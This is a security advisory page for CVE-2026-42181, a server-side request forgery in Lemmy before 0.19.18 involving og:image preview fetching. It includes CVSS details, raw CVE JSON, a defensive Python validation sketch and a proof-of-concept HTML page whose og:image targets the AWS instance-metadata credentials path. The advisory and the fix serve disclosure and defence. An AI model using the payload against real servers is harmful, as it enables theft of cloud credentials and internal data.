Security Vulnerability Report
CVE-2026-42181 CVSS 6.5 MEDIUM

CVE-2026-42181

Published: 2026-05-08 20:16:31
Last Modified: 2026-05-11 17:16:33

Description

Lemmy is a link aggregator and forum for the fediverse. Prior to version 0.19.18, Lemmy fetches metadata for user-supplied post URLs and, under the default StoreLinkPreviews image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted og:image URL is not subject to the same restriction. As a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users. This issue has been patched in version 0.19.18.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

Lemmy < 0.19.18

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- PoC Description: Malicious HTML file to be hosted on a public server.
     The attacker sets the og:image tag to an internal resource (e.g., AWS metadata). -->
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta property="og:title" content="SSRF PoC">
  <!-- Pointing to an internal resource to trigger Lemmy to fetch it -->
  <meta property="og:image" content="http://169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance">
  <title>Lemmy CVE-2026-42181 PoC</title>
</head>
<body>
  <h1>If you see this, the page is hosted correctly.</h1>
  <p>Submit this URL to Lemmy to trigger the vulnerability.</p>
</body>
</html>
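The check the advisory describes as missing, the internal-range test applied to the extracted og:image URL and not only to the page URL, shown as an added illustration that is not Lemmy's or pict-rs's own code. The sample HTML, the host names and the injectable resolver are constructed so the check runs offline; a real fetcher must additionally connect to the address it validated and re-check every redirect.

```python
import ipaddress
import socket
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Constructed sample: a public page whose og:image points at the cloud metadata service.
SAMPLE_HTML = """<html><head>
<meta property="og:title" content="SSRF PoC">
<meta property="og:image" content="http://169.254.169.254/latest/meta-data/">
</head><body></body></html>"""


class OgImageParser(HTMLParser):
    """Collects the first <meta property="og:image" content="..."> value."""

    def __init__(self):
        super().__init__()
        self.og_image = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "meta" and a.get("property") == "og:image" and self.og_image is None:
            self.og_image = a.get("content")


def extract_og_image(page_url, html):
    """Absolute og:image URL resolved against the page URL (relative values are legal)."""
    p = OgImageParser()
    p.feed(html)
    return urljoin(page_url, p.og_image) if p.og_image else None


def is_internal_target(url, resolve=socket.gethostbyname):
    """True if the URL must not be fetched server-side: non-http(s) scheme, missing or
    unresolvable host, or a host resolving to a non-global address (loopback, RFC 1918,
    link-local such as 169.254.169.254). `resolve` is injectable for offline tests."""
    u = urlparse(url)
    if u.scheme not in ("http", "https") or not u.hostname:
        return True
    try:
        ip = ipaddress.ip_address(resolve(u.hostname))
    except (OSError, ValueError):
        return True  # fail closed on resolution errors
    return not ip.is_global


def safe_preview_image(page_url, html, resolve=socket.gethostbyname):
    """The missing step: apply the same range check to the extracted image URL as to the
    page URL. Connect to the checked IP and re-check redirects, or rebinding bypasses it."""
    img = extract_og_image(page_url, html)
    return None if img is None or is_internal_target(img, resolve) else img
```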

Weakness

CWE-918 (Server-Side Request Forgery), as recorded in the raw JSON data below.

References

https://github.com/LemmyNet/lemmy/releases/tag/0.19.18
https://github.com/LemmyNet/lemmy/security/advisories/GHSA-h6hf-9846-xwrq

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-42181",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T20:16:31.160",
    "lastModified": "2026-05-11T17:16:32.543",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Lemmy is a link aggregator and forum for the fediverse. Prior to version 0.19.18, Lemmy fetches metadata for user-supplied post URLs and, under the default StoreLinkPreviews image mode, downloads the preview image through local pict-rs. While the top-level page URL is checked against internal IP ranges, the extracted og:image URL is not subject to the same restriction. As a result, an authenticated low-privileged user can submit an attacker-controlled public page whose Open Graph image points to an internal image endpoint. Lemmy will fetch that internal image server-side and store a local thumbnail that can then be served back to users. This issue has been patched in version 0.19.18."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-918"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/LemmyNet/lemmy/releases/tag/0.19.18",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/LemmyNet/lemmy/security/advisories/GHSA-h6hf-9846-xwrq",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/LemmyNet/lemmy/security/advisories/GHSA-h6hf-9846-xwrq",
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
      }
    ]
  }
}